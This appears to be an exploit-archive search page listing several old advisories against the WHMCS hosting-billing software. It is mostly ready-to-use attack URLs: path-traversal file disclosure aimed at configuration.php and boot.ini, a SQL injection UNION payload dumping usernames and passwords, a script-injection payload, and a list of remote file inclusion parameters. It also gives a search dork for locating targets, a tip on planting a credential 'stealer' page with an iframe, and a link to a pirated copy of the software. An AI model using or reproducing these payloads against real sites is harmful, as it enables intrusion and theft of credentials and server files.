whmcs
Search result for 'whmcs'
(0.0112490653992 seconds)
Lagripe-Dz and Mc./WHMCompleteSolution (cart.php) Local File Disclosure ( php)
# Title : WHMCompleteSolution (cart.php) Local File Disclosure
# Author : Lagripe-Dz
# Product : WHMCS ( WHMCompleteSolution )
# Vendor : http://whmcs.com/
# Date : 10/01/2011
# Version : 3.x.x , 4.0.x
# Tested on : linux+apache
================================================================
Vuln file: cart.php
---------
Vuln code:
---------
if ( $a == "add" )
{
$templatefile = "configureproductdomain";
....etc
}
if ( $a == "login" )
{
$templatefile = "login";
....etc
}
...
outputClientArea( $templatefile, $nowrapper );
# outputClientArea function will display
"./templates/orderforms/cart/{$templatefile}.tpl"
Details :
---------
if variable "$a" has a true value .. will set "$templatefile" value by
default
but when "$a" value didn't match the defaults values
you can control "$templatefile" and use it as ( File Disclosure )
Proof of Concept :
------------------
http://domain.tld/[PATH]/cart.php?a=[wrong_value]&templatefile=[LFD]%00
http://domain.tld/[PATH]/cart.php?a=test&templatefile=../../../configuration.php%00
note* : show the page source to see Disclosure file.
Solution :
----------
the vendor Notificate
update to the last version
================================================================
Greetz To All www.Sec4ever.com Members.
Dr.0rYX and Cr3w-./WHMCompleteSolution CMS sql Injection Vulnerability ( php)
ALGERIAN HACKER
**********************- NORTH-AFRICA SECURITY TEAM -***********************
[!] WHMCompleteSolution CMS sql Injection Vulnerability
[!] Author : Dr.0rYX and Cr3w-DZ
[!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de
***************************************************************************/
[ Software Information ]
[+] Vendor : http://www.siamhostserver.com/whmcs/
[+] script : WHMCompleteSolution CMS
[+] Download : http://www.siamhostserver.com/whmcs/ (sell script)
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"weblink_cat_list.php?bcat_id="
**************************************************************************/
[ Vulnerable File ]
http://server/weblink_cat_list.php?bcat_id=[N.A.S.T ]
[ Exploit ]
http://server/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user
[ GReets ]
[+] :CLAW , le0n , HIS0K4 , WWW.exploit-db.com , ALL HACKERS MUSLIMS
Lagripe-Dz/WHMCompleteSolution Local File Disclosure ( na)
# Title : WHMCompleteSolution (cart.php) Local File Disclosure
# Author : Lagripe-Dz
# Product : WHMCS ( WHMCompleteSolution )
# Vendor : http://whmcs.com/
# Date : 10/01/2011
# Version : 3.x.x , 4.0.x
# Tested on : linux+apache
================================================================
Vuln file: cart.php
---------
Vuln code:
---------
if ( $a == "add" )
{
$templatefile = "configureproductdomain";
....etc
}
if ( $a == "login" )
{
$templatefile = "login";
....etc
}
...
outputClientArea( $templatefile, $nowrapper );
# outputClientArea function will display
"./templates/orderforms/cart/{$templatefile}.tpl"
Details :
---------
if variable "$a" has a true value .. will set "$templatefile" value by
default
but when "$a" value didn't match the defaults values
you can control "$templatefile" and use it as ( File Disclosure )
Proof of Concept :
------------------
http://domain.tld/[PATH]/cart.php?a=[wrong_value]&templatefile=[LFD]%00
http://domain.tld/[PATH]/cart.php?a=test&templatefile=../../../configuration.php%00
note* : show the page source to see Disclosure file.
Solution :
----------
the vendor Notificate
update to the last version
================================================================
Greetz To All www.Sec4ever.com Members.
WHMCompleteSolution suffers from a local file disclosure vulnerability in cart.php.
indoushka/WHMCompleteSolution Cross Site Scripting ( na)
======================================================================================== | # Title : WHMCompleteSolution Cross Site Scripting in URI Vulnerability | | # Author : indoushka | | # email : indoushka@hotmail.com | | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : www.iq-ty.com | | # Script : Copyright © WHMCompleteSolution. All Rights Reserved. | | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | | # Bug : XSS | ====================== Exploit By indoushka ================================= | # Exploit : | | 1- http://server/whmcs/install/install.php/>"><ScRiPt>alert(213771818860)</ScRiPt> | ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * -------------------------------------------------------------------------------------------
WHMCompleteSolution suffers from a cross site scripting vulnerability.
ZxH-Labs/WHMCompleteSolution 3.x/4.x Multiple Vulnerabilities ( php)
$b0x# WHMCS ( WHMCompleteSolution ) 3.x / 4.x Multiple Vulnerability !
$b0x# ZxH-Labs
$b0x# 1st-NOV-11
$b0x# Www.Sec4ever.coM
$b0x# WH-03 On Windows IIS 6.0
========================================================
b0x@1337b0x:/b0x/Exploits/WebAPP# whoami
ZxH-Labs | Www.Sec4ever.coM
b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.XPL
EXPL Type : Local File Disclosure
Files : Submitticket.php , Downloads.php
-> I: submitticket.php?step=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
EX : submitticket.php?step=b0x&templatefile=../../../../../../../../../boot.ini%00
->II: downloads.php?action=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
EX : downloads.php?action=b0x&templatefile=../../../../../../../../../boot.ini%00
b0x@1337b0x:/b0x/Exploits/WebAPP#
b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.bug
Bug TYPE : Local File Include
Bug File : Reports.php
-I : reports.php?report=[LFI]%00
EX : admin/reports.php?report=../../../../../../../boot.ini%00
You Can Use This Bug When You Get Forbidden Access In Lux Symlink !
However You Can Make Stealer into "/tmp" Directory With EXT .htm And The Full ISSUE Will Be
-FI : admin/reports.php?report=../../../../../../../tmp/b0x.htm%00
And Don't Forget To Use IFRAME With Evil Code'z =))
b0x@1337b0x:/b0x/Exploits/WebAPP# Logout
========================================================
$b0x# Greet'z 2 T0R0B0XHACKER | X-Shadow | Sec4ever | TNT_HACKER | r1z | Tw1st3r | S4S
Cyb3r-1st | Red Virus | I-Hmx | h311 c0d3 | TacticiaN | Th3MMA | FreeMan(LY) | Ma3stro_DZ
Mr.L4iv3 And All Q8'z
./b0x
EL-KAHINA/WHCMS 5.0.3 Remote File Inclusion ( na)
=============================
WHCMS 5.0.3 RFI Vulnerability
=============================
# Vendor: http://www111.uploadic.com:182/d/lv3zgp6yj2cfgxklqxi4mynirfnjs2nyh24iq333xeusev45v5xeuv7m/WHCMS-5.0.3%20Nulled-FuckCopyright.Net.rar
# Date: 2012-4-2
# Author : El-Kahina
# Tested on : Xp3
########################################################
# Dork : Copyright © WHMCS 2005-2012
-------------
Function: require File: announcements.php Line: 77
Exploit: http://localhost/WHCMS/announcements.php?supportmodulepath=[EV!L]
##################################################
Function: require File: announcements.php Line: 77
Exploit: http://localhost/WHCMS/announcements.php?supportmodulepath=[EV!L]
##################################################
Function: include File: dbconnect.php Line: 460
Exploit: http://localhost/WHCMS/dbconnect.php?langfilepath=[EV!L]
##################################################
Function: include File: dbconnect.php Line: 460
Exploit: http://localhost/WHCMS/dbconnect.php?langfilepath=[EV!L]
##################################################
Function: require File: downloads.php Line: 142
Exploit: http://localhost/WHCMS/downloads.php?supportmodulepath=[EV!L]
##################################################
Function: require File: downloads.php Line: 142
Exploit: http://localhost/WHCMS/downloads.php?supportmodulepath=[EV!L]
##################################################
Function: require File: index.php Line: 51
Exploit: http://localhost/WHCMS/index.php?modulepath=[EV!L]
##################################################
Function: require File: index.php Line: 81
Exploit: http://localhost/WHCMS/index.php?addonlangfile=[EV!L]
##################################################
Function: require File: index.php Line: 51
Exploit: http://localhost/WHCMS/index.php?modulepath=[EV!L]
##################################################
Function: require File: index.php Line: 81
Exploit: http://localhost/WHCMS/index.php?addonlangfile=[EV!L]
##################################################
Function: require_once File: clientareafunctions.php Line: 313
Exploit: http://localhost/WHCMS/includes/clientareafunctions.php?gateway}=[EV!L]
##################################################
Function: include File: core.display_debug_console.php Line: 2
Exploit: http://localhost/WHCMS/includes/smarty/internals/core.display_debug_console.php?_compile_path=[EV!L]
##################################################
Function: include_once File: core.load_resource_plugin.php Line: 2
Exploit: http://localhost/WHCMS/includes/smarty/internals/core.load_resource_plugin.php?_plugin_file=[EV!L]
##################################################
Function: include File: core.process_compiled_include.php Line: 1
Exploit: http://localhost/WHCMS/includes/smarty/internals/core.process_compiled_include.php?smarty=[EV!L]
##################################################
Function: include File: core.smarty_include_php.php Line: 1
Exploit: http://localhost/WHCMS/includes/smarty/internals/core.smarty_include_php.php?params[smarty_include_vars]=[EV!L]
##################################################
Function: include File: core.write_compiled_include.php Line: 1
Exploit: http://localhost/WHCMS/includes/smarty/internals/core.write_compiled_include.php?smarty=[EV!L]
##################################################
Function: include File: function.config_load.php Line: 5
Exploit: http://localhost/WHCMS/includes/smarty/plugins/function.config_load.php?_compile_file=[EV!L]
##################################################
Function: require File: boleto.php Line: 128
Exploit: http://localhost/WHCMS/modules/gateways/boleto/boleto.php?banco=[EV!L]
##################################################
Greetz : Exploit-db Team
all my friend :(Dz-Ghost Team )
im indoushka's sister
------------------------------------------
----------------------------------------------------------
WHCMS version 5.0.3 suffers from a remote file inclusion vulnerability.